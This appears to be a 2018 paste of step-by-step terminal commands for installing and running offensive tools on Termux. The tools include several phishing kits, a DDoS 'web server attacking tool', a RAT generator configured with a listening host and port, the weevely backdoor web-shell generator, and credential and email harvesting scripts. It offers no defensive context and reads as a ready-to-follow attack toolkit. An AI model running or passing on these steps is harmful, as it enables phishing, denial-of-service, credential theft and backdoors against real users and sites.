· 7 years ago · Sep 18, 2018, 03:08 PM
1 Cyber-scan
2
3apt update && apt upgrade
4
5apt install gitÂ
6
7apt install python2
8
9apt install python
10
11git clone https://github.com/medbenali/CyberScan.git
12
13cd CyberScan
14
15python2 CyberScan.py -v
16
17 Goblin word Generator
18
19apt updateÂ
20
21apt upgrade
22
23apt install git
24
25apt install python
26
27apt install python2
28
29git clone https://github.com/UndeadSec/GoblinWordGenerator
30
31cd GoblinWordGenerator
32
33chmod +x *
34
35python3 goblin.py
36
37 shell-Phish
38
39apt updateÂ
40
41apt upgrade
42
43apt install git
44
45git clone https://github.com/thelinuxchoice/shellphish
46
47cd shellphish
48
49chmod +x *
50
51bash shellphish.sh
52
53 BlackEye
54
55apt updateÂ
56
57apt upgrade
58
59apt install git
60
61git clone https://github.com/thelinuxchoice/blackeye.git
62
63cd blackeye
64
65chmod +x *
66
67bash blackeye.sh
68
69 DarkFly 400+ Tools
70
71apt updateÂ
72
73apt upgrade
74
75apt install git
76
77git clone https://github.com/Ranginang67/DarkFly-Tool
78
79cd DarkFly-Tool
80
81chmod +x *
82
83sh install
84
85DarkFly
86
87 click jacking scan
88
89apt update && apt upgrade
90
91apt install gitÂ
92
93apt install python2
94
95apt install python
96
97git clone https://github.com/D4Vinci/Clickjacking-Tester
98
99cd Clickjacking-Tester
100
101chmod +x *
102
103python3 Clickjacking-Tester.py file.txt
104
105credmap check login mail
106
107apt update && apt upgrade
108
109apt install gitÂ
110
111apt install python2
112
113apt install python
114
115git clone https://github.com/lightos/credmap
116
117cd credmap
118
119chmod +x *
120
121python2 credmap.py -h
122
123It shows all options to use this tool
124
125python2 credmap.py --username king --email ??????@email.com
126
127 infoga collect mail info
128
129apt update && apt upgrade
130
131apt install gitÂ
132
133apt install python2
134
135git clone https://github.com/m4ll0k/Infoga
136
137cd Infoga
138
139chmod +x *
140
141pip2 install requests
142
143python2 infoga.py
144
145python2 infoga.py -t gmail.com -s all
146
147 Harvester mail info
148
149apt update && apt upgrade
150
151apt install gitÂ
152
153apt install python2
154
155apt install python
156
157git clone https://github.com/laramies/theHarvester
158
159cd theHarvester
160
161chmod +x *
162
163python2 theHarvester.py
164
165python2 theHarvester.py -d site.com -b google
166
167 Ddos webs server attacking tool
168
169apt update && apt upgrade
170
171apt install gitÂ
172
173apt install python2
174
175apt install python
176
177git clone https://github.com/verluchie/dost-attack
178
179cd dost-attack
180
181chmod +x *
182
183./install.sh
184
185./dost
186
187 A-Rat exploit
188
189apt updateÂ
190
191apt upgrade
192
193apt install git
194
195apt install python2
196
197apt install python
198
199git clone https://github.com/Xi4u7/A-Rat
200
201cd A-Rat
202
203chmod +x *
204
205python2 A-Rat.py
206
207help
208
209set host 127.0.0.1 [your ip]
210
211set port 1337
212
213set output /$HOME/rat.py
214
215ls
216
217run
218
219python2 rat.py
220
221 Termux make phone call
222
223Termux AppÂ
224
225Termux API App
226
227apt updateÂ
228
229apt upgrade
230
231apt install termux-api
232
233termux-telephony-call +959?????
234
235 Termux Make sms
236
237apt updateÂ
238
239apt upgrade
240
241apt install termux-api
242
243termux-sms-send -n +959????? text
244
245
246
247apt updateÂ
248
249apt upgrade
250
251apt install git
252
253apt install tsu
254
255apt install ncurses-utils
256
257git clone https://github.com/termux-sudo
258
259cd termux-sudo
260
261cat sudo > /data/data/com.termux/files/usr/bin/sudo
262
263chmod 700 /data/data/com.termux/files/usr/bin/sudo
264
265sudo su
266
267sudo tsu
268
269Now you are a root user.
270
271 weeman is a phishing toolÂ
272
273apt updateÂ
274
275apt upgrade
276
277apt install git
278
279apt install python2
280
281git clone https://github.com/evait-security/weeman
282
283cd weeman
284
285chmod +x *
286
287python2 weeman.py
288
289set url http://target.com
290
291set action_url http://target.com
292
293run
294
295 Social fish phishing tool
296
297apt updateÂ
298
299apt upgrade
300
301apt install git
302
303apt install python2
304
305git clone https://github.com/UndeadSec/SocialFish.git
306
307cd SocialFish
308
309chmod +x *
310
311pip2 install -r requirements.txt
312
313python2 SocialFish.py
314
315 weevely backdoor web-shell
316
317apt update && apt upgrade
318
319apt install gitÂ
320
321apt install python2
322
323git clone https://github.com/glides/Weevely
324
325cd Weevely
326
327chmod +x *
328
329python2 weevely.py
330
331python2 weevely.py generate 123456 /$HOME/shell.php
332
333123456 = is the password for shell
334
335shell.php = name for the shell